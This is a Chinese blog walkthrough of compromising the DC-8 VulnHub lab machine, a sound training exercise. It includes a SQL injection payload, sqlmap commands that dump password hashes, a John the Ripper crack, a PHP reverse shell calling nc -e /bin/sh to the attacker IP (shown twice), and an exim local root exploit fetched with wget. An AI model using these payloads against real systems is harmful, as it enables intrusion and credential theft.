DC-8靶机渗透测试详细教程

本文详细记录了从发现DC-8 web应用的SQL注入漏洞,到使用SQLMap、John进行密码破解,再到目录扫描、权限提升,最终通过利用exim4漏洞实现远程代码执行的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

DC-8

DC-8下载:https://download.vulnhub.com/dc/DC-8.zip.torrent

攻击者kali:192.168.1.11

受害者DC-8:192.168.1.8

使用arp-scan -l 扫描出DC-8的IP地址

使用nmap扫描

nmap -sS -A -p- 192.168.1.8

得到22和80端口

进入到web界面

没有具体的重要信息

当点击旁边Details下面的内容的时候发现rul好像有sql注入

尝试手工注入

http://192.168.1.8/?nid=1%20and%20updatexml(1,concat(0x7e,database()),1)#

有注入漏洞

使用sqlmap注入

顺便温习一下sqlmap工具注入使用

sqlmap -u http://192.168.1.8/?nid=1 -–dbs   查看当前数据库

和手工注入一样显示的数据库是  d7db

sqlmap -u http://192.168.1.8/?nid=1 -D d7db --tables 爆出数据库的表

有users表肯定直接爆这个表

爆出 字段

sqlmap -u http://192.168.1.8/?nid=1 -D d7db -T users –dump

得到admin和john账号的hash值

那么接下来尝试使用john来爆一下这两个账号的hash值

john 是一款大受欢迎的、免费的开源软件、基于字典的密码破解工具。用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如 DES 、 MD4 、 MD5 等。 John 支持字典破解方式和暴力破解方式。它支持多种不同类型的系统架构,包括 Unix 、 Linux 、 Windows 、 DOS 模式、 BeOS 和 OpenVMS ,主要目的是破解不够牢固的 Unix/Linux 系统密码

在桌面创建一个dc8.txt的文本将两hash值写入

使用john命令爆

john --wordlist=/usr/share/john/password.lst --rules dc8.txt

得出了一个  turtle ,还有一个半天没出,估计很久

先下一步,扫描一下登录的目录

使用dirb目录扫描工具扫

最后的到的目录是/user

尝试使用admin和john登录

john登录成功

经过一番折腾后发现有可以写php代码的地方

来到这里将shell反弹代码写进去

<p>demon</p>

<?php

system("nc -e /bin/sh 192.168.1.11 4444");

?>

一定要先选PHP然在写代码进去

并且选择php

然后kali开启监听

web页面往下滑找到保存按钮

显示保存成功

点击VIEW

在这个界面填好内容,点击按钮提交

kali接收到反弹

开启交互

python -c 'import pty;pty.spawn("/bin/bash")'

尝试提权

find / -perm -u=s -type f 2>/dev/null

exim4 --version

查看版本是4.89的

漏洞库搜索一下

searchsploit exim 4 

直接使用这个4.87 -4.96

cat /usr/share/exploitdb/exploits/linux/local/46996.sh  

查看一下脚本

明天写脚本解释

将脚本复制到桌面,命名为DC8shell.sh

cp /usr/share/exploitdb/exploits/linux/local/46996.sh /root/桌面/DC8shell.sh

在使用vim打开

vim DC8shell.sh

到这里按键盘esc

然后按键盘shift+:

输入set ff=unix

回车,然后保存退出

使用python开启http服务

python -m http.server 8899

开启成功后可以在浏览器打开看看

然后选择刚刚复制的DC8shell.sh路径

回到控制终端

进入到tmp目录

cd /tmp

输入wget将地址粘贴进去,回车

下载成功

chmod 777 DC8shell.sh  给脚本权限

./DC8shell.sh -m netcat   执行脚本

拿到root权限

进入到root目录下拿到flag

DC-8总结

sql手工注入判断是否有sql注入漏洞

sqlmap工具注入使用,得到网站管理员的hash值

john对hash值的爆破使用

dirb目录扫描得到admin登录地址

找到可执行php代码的漏洞地方

使用php代码将shell反弹

<p>demon</p>

<?php

system("nc -e /bin/sh 192.168.1.11 4444");

?>

打开交互模式python -c 'import pty;pty.spawn("/bin/bash")'

尝试提权find / -perm -u=s -type f 2>/dev/null

发现exim4

查看exim4版本号

kali漏洞库查找searchsploit exim 4 

查看漏洞脚本并且使用提权

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

啊醒

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值